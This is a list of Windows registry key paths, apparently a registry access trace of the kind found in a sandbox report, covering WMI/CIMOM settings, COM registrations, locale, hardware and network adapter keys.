HKEY_LOCAL_MACHINE\system\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{38181897-81DF-46DF-B672-41CDC535E56A}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{579A6966-C0FB-45AC-8379-06998D5555AC}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{B6163BF2-D835-47D4-89B4-17AE7B8CEA4A}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D41932EF-4BF0-47DF-BD44-7A03A2C12FE0}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\ESS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/subscription
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{d63a5850-8f16-11cf-9f47-00aa00bf345c}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="CIMWin32"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/CIMV2\SCM Event Provider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\SecurityCenter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\009
HKEY_PERFORMANCE_TEXT\Counter
HKEY_PERFORMANCE_DATA\238
HKEY_LOCAL_MACHINE\HARDWARE\Description\System
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
HKEY_LOCAL_MACHINE\SYSTEM
HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CoDeviceInstallers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\InfPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\InfSection
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\InstalledDisplayDrivers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\HardwareInformation.MemorySize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\HardwareInformation.ChipType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\HardwareInformation.DACType
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{71F897D7-EB7C-4D8D-89DB-AC80D9DD2270}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0001\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{29898C9D-B0A4-4FEF-BDB6-57A562022CEE}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0002\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{E43D242B-9EAB-4626-A952-46649FBB939A}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Ndi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0003\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tcpip\Parameters\Adapters\{DF4A9D2C-8742-4EB1-8703-D395C4183F33}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0004
